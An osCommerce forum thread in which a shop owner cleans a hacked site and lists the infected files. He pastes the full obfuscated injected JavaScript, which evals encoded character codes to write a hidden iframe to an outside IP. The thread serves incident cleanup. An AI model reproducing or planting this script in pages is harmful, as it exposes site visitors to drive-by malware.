Jump to content


Corporate Sponsors


Latest News: (loading..)

- - - - -

Error in a homepage

Started by Racing Club, Mar 13 2011, 17:57

27 replies to this topic

#21 DunWeb

  • Community Sponsor
  • 10,464 posts
  • Real Name:Chris Dunn
  • Gender:Male
  • Location:Tecumseh, Ontario, Canada N8N 1X8

Posted 17 March 2011, 06:21

Ariel,

If you are seeing other URL's in the progress bar on the footer of your browser, this means you have not cleaned the site entirely. If your Admin page is blank, then there is a code error, possibly whitespace before or after the opening or closing PHP tags.




Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:

:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:

#22 Racing Club

  • Community Member
  • 17 posts
  • Real Name:Ariel
  • Gender:Not Telling
  • Location:Córdoba, Argentina.

Posted 17 March 2011, 18:35

Chris,

Look at the footer of my browser:

[IMG]http://i52.tinypic.com/16lmsz9.jpg[/IMG]


[IMG]http://i54.tinypic.com/vdo4k9.jpg[/IMG]


[IMG]http://i55.tinypic.com/2m5zb53.jpg[/IMG]

What should I do?

#23 Racing Club

  • Community Member
  • 17 posts
  • Real Name:Ariel
  • Gender:Not Telling
  • Location:Córdoba, Argentina.

Posted 17 March 2011, 19:30

That only happens when I open my website with Internet Explorer with Mozilla Firefox does not happen.

Someone could go to my website and see if the same please

Thanks

Edited by Racing Club, 17 March 2011, 19:39.

#24 DunWeb

  • Community Sponsor
  • 10,464 posts
  • Real Name:Chris Dunn
  • Gender:Male
  • Location:Tecumseh, Ontario, Canada N8N 1X8

Posted 17 March 2011, 19:38

Ariel,

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.





Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:

:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:

#25 Racing Club

  • Community Member
  • 17 posts
  • Real Name:Ariel
  • Gender:Not Telling
  • Location:Córdoba, Argentina.

Posted 17 March 2011, 20:13

View PostDunWeb, on 17 March 2011, 19:38, said:

Ariel,

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.


Chris

What do you see?

because I delete temp files and cookies and I keep seeing the same thing

Thanks!

#26 Racing Club

  • Community Member
  • 17 posts
  • Real Name:Ariel
  • Gender:Not Telling
  • Location:Córdoba, Argentina.

Posted 25 March 2011, 23:16

yeah!

I just clean up the web.

The infected files were:

public_html> index.php
public_html> admin> index.php
public_html> includes > languages > english > index.php
public_html> includes > languages > german > index.php
public_html> includes > languages > español > index.php
public_html> includes > languages > dutch > index.php
public_html> admin > includes > languages > english > index.php
public_html> admin > includes > languages > german > index.php
public_html> admin > includes > languages > español > index.php
public_html> admin > includes > languages > dutch > index.php


Malicious code that I found is this:
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var ucyq=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var vpm=r[i].cssRules||r[i].rules;for(var lqf=0;lqf<vpm.length;lqf++){var gl=vpm.item?vpm.item(lqf):vpm[lqf];if(!gl.selectorText.match(/#va/))continue;qq=(gl.cssText)?gl.cssText:gl.style.cssText;ucyq=qq.match(/(S[^")]+)/)[1];zio=gl.selectorText.substr(1);};}catch(e){};}oe=new Date(2010,11,3,2,21,4);t=oe.getSeconds();var vo=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var fme="";var g=function(){return this;}();tevq=g["e"+zio+"l"];var cet="";hj=tevq(ucyq);for(var i=0;i<vo.length;i++){aig=tevq(vo[i]);cet+=hj(aig);}tevq(cet);</script><script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var ucyq=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var vpm=r[i].cssRules||r[i].rules;for(var lqf=0;lqf<vpm.length;lqf++){var gl=vpm.item?vpm.item(lqf):vpm[lqf];if(!gl.selectorText.match(/#va/))continue;qq=(gl.cssText)?gl.cssText:gl.style.cssText;ucyq=qq.match(/(S[^")]+)/)[1];zio=gl.selectorText.substr(1);};}catch(e){};}oe=new Date(2010,11,3,2,21,4);t=oe.getSeconds();var vo=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var fme="";var g=function(){return this;}();tevq=g["e"+zio+"l"];var cet="";hj=tevq(ucyq);for(var i=0;i<vo.length;i++){aig=tevq(vo[i]);cet+=hj(aig);}tevq(cet);</script>



I also changed the 2 general.js, but I'm not sure.

The general.js that I had on my website it was this:



<?php
/*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2007 osCommerce

Released under the GNU General Public License
*/

require('includes/application_top.php');

$languages = tep_get_languages();
$languages_array = array();
$languages_selected = DEFAULT_LANGUAGE;
for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
$languages_array[] = array('id' => $languages[$i]['code'],
'text' => $languages[$i]['name']);
if ($languages[$i]['directory'] == $language) {
$languages_selected = $languages[$i]['code'];
}
}

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ">
<meta name="robots" content="noindex,nofollow">
<title><?php echo TITLE; </title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<script language="javascript" src="includes/general.js"></script>
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="SetFocus();">
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php');
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
<tr>
<td width="<?php echo BOX_WIDTH; " valign="top"><table border="0" width="<?php echo BOX_WIDTH; " cellspacing="1" cellpadding="1" class="columnLeft">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php');
<!-- left_navigation_eof //-->
</table></td>
<!-- body_text //-->
<td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td><table border="0" width="100%" cellspacing="0" cellpadding="2" height="40">
<tr>
<td class="pageHeading"><?php echo STORE_NAME; </td>
<td class="pageHeading" align="right"><?php echo tep_draw_form('adminlanguage', FILENAME_DEFAULT, '', 'get') . tep_draw_pull_down_menu('language', $languages_array, $languages_selected, 'onChange="this.form.submit();"') . tep_hide_session_id() . '</form>'; </td>
</tr>
</table></td>
</tr>
<tr>
<td><table border="0" width="100%" cellspacing="0" cellpadding="2">
<?php
$file_extension = substr($PHP_SELF, strrpos($PHP_SELF, '.'));
$files = array();
if ($dir = @dir(DIR_FS_ADMIN . 'includes/modules/index')) {
while ($file = $dir->read()) {
if (!is_dir($module_directory . $file)) {
if (substr($file, strrpos($file, '.')) == $file_extension) {
$files[] = $file;
}
}
}
sort($files);
$dir->close();
}

$col = 0;

for ($i=0, $n=sizeof($files); $i<$n; $i++) {
if (file_exists(DIR_WS_LANGUAGES . $language . '/modules/index/' . $files[$i])) {
include(DIR_WS_LANGUAGES . $language . '/modules/index/' . $files[$i]);
}

if ($col < 1) {
echo ' <tr>' . "\n";
}

$col++;

if ($col <= 2) {
echo ' <td width="50%" valign="top">' . "\n";
}

include('includes/modules/index/' . $files[$i]);

if ($col <= 2) {
echo ' </td>' . "\n";
}

if ( !isset($files[$i+1]) || ($col == 2) ) {
if ( !isset($files[$i+1]) && ($col == 1) ) {
echo ' <td width="50%" valign="top">&nbsp;</td>' . "\n";
}

$col = 0;

echo ' </tr>' . "\n";
}
}

</table></td>
</tr>
</table></td>
</tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php');
<!-- footer_eof //-->
<br>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>




but a general.js oscommerce so:




/*
$Id: general.js 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2003 osCommerce

Released under the GNU General Public License
*/

function SetFocus(TargetFormName) {
var target = 0;
if (TargetFormName != "") {
for (i=0; i<document.forms.length; i++) {
if (document.forms[i].name == TargetFormName) {
target = i;
break;
}
}
}

var TargetForm = document.forms[target];

for (i=0; i<TargetForm.length; i++) {
if ( (TargetForm.elements[i].type != "image") && (TargetForm.elements[i].type != "hidden") && (TargetForm.elements[i].type != "reset") && (TargetForm.elements[i].type != "submit") ) {
TargetForm.elements[i].focus();

if ( (TargetForm.elements[i].type == "text") || (TargetForm.elements[i].type == "password") ) {
TargetForm.elements[i].select();
}

break;
}
}
}

function RemoveFormatString(TargetElement, FormatString) {
if (TargetElement.value == FormatString) {
TargetElement.value = "";
}

TargetElement.select();
}

function CheckDateRange(from, to) {
if (Date.parse(from.value) <= Date.parse(to.value)) {
return true;
} else {
return false;
}
}

function IsValidDate(DateToCheck, FormatString) {
var strDateToCheck;
var strDateToCheckArray;
var strFormatArray;
var strFormatString;
var strDay;
var strMonth;
var strYear;
var intday;
var intMonth;
var intYear;
var intDateSeparatorIdx = -1;
var intFormatSeparatorIdx = -1;
var strSeparatorArray = new Array("-"," ","/",".");
var strMonthArray = new Array("jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec");
var intDaysArray = new Array(31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);

strDateToCheck = DateToCheck.toLowerCase();
strFormatString = FormatString.toLowerCase();

if (strDateToCheck.length != strFormatString.length) {
return false;
}

for (i=0; i<strSeparatorArray.length; i++) {
if (strFormatString.indexOf(strSeparatorArray[i]) != -1) {
intFormatSeparatorIdx = i;
break;
}
}

for (i=0; i<strSeparatorArray.length; i++) {
if (strDateToCheck.indexOf(strSeparatorArray[i]) != -1) {
intDateSeparatorIdx = i;
break;
}
}

if (intDateSeparatorIdx != intFormatSeparatorIdx) {
return false;
}

if (intDateSeparatorIdx != -1) {
strFormatArray = strFormatString.split(strSeparatorArray[intFormatSeparatorIdx]);
if (strFormatArray.length != 3) {
return false;
}

strDateToCheckArray = strDateToCheck.split(strSeparatorArray[intDateSeparatorIdx]);
if (strDateToCheckArray.length != 3) {
return false;
}

for (i=0; i<strFormatArray.length; i++) {
if (strFormatArray[i] == 'mm' || strFormatArray[i] == 'mmm') {
strMonth = strDateToCheckArray[i];
}

if (strFormatArray[i] == 'dd') {
strDay = strDateToCheckArray[i];
}

if (strFormatArray[i] == 'yyyy') {
strYear = strDateToCheckArray[i];
}
}
} else {
if (FormatString.length > 7) {
if (strFormatString.indexOf('mmm') == -1) {
strMonth = strDateToCheck.substring(strFormatString.indexOf('mm'), 2);
} else {
strMonth = strDateToCheck.substring(strFormatString.indexOf('mmm'), 3);
}

strDay = strDateToCheck.substring(strFormatString.indexOf('dd'), 2);
strYear = strDateToCheck.substring(strFormatString.indexOf('yyyy'), 2);
} else {
return false;
}
}

if (strYear.length != 4) {
return false;
}

intday = parseInt(strDay, 10);
if (isNaN(intday)) {
return false;
}
if (intday < 1) {
return false;
}

intMonth = parseInt(strMonth, 10);
if (isNaN(intMonth)) {
for (i=0; i<strMonthArray.length; i++) {
if (strMonth == strMonthArray[i]) {
intMonth = i+1;
break;
}
}
if (isNaN(intMonth)) {
return false;
}
}
if (intMonth > 12 || intMonth < 1) {
return false;
}

intYear = parseInt(strYear, 10);
if (isNaN(intYear)) {
return false;
}
if (IsLeapYear(intYear) == true) {
intDaysArray[1] = 29;
}

if (intday > intDaysArray[intMonth - 1]) {
return false;
}

return true;
}

function IsLeapYear(intYear) {
if (intYear % 100 == 0) {
if (intYear % 400 == 0) {
return true;
}
} else {
if ((intYear % 4) == 0) {
return true;
}
}

return false;
}



What should I use?

Thank you very much to all

#27 Taipo

  • Community Member
  • 751 posts
  • Real Name:Te Taipo
  • Gender:Male

Posted 27 March 2011, 00:02

You are almost there. Those are files that have been overwritten by an attacker. What you need to find now is the file they are using to do this. If you can bare to read yet another discussion on the matter, read the one in my signature about cookie_usage.php and the code that is often added into it and other files which allows attackers to do this type of overwriting which you have experienced here. See below: 'Another discussion infected files...'

Edited by Taipo, 27 March 2011, 00:04.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here

#28 Racing Club

  • Community Member
  • 17 posts
  • Real Name:Ariel
  • Gender:Not Telling
  • Location:Córdoba, Argentina.

Posted 05 May 2011, 04:02

View PostTaipo, on 27 March 2011, 00:02, said:

You are almost there. Those are files that have been overwritten by an attacker. What you need to find now is the file they are using to do this. If you can bare to read yet another discussion on the matter, read the one in my signature about cookie_usage.php and the code that is often added into it and other files which allows attackers to do this type of overwriting which you have experienced here. See below: 'Another discussion infected files...'

Thank you!
Back to General Discussions · Next Unread Topic →


  1. osCommerce Support Forum
  2. General Topics
  3. General Discussions
  4. Forum Rules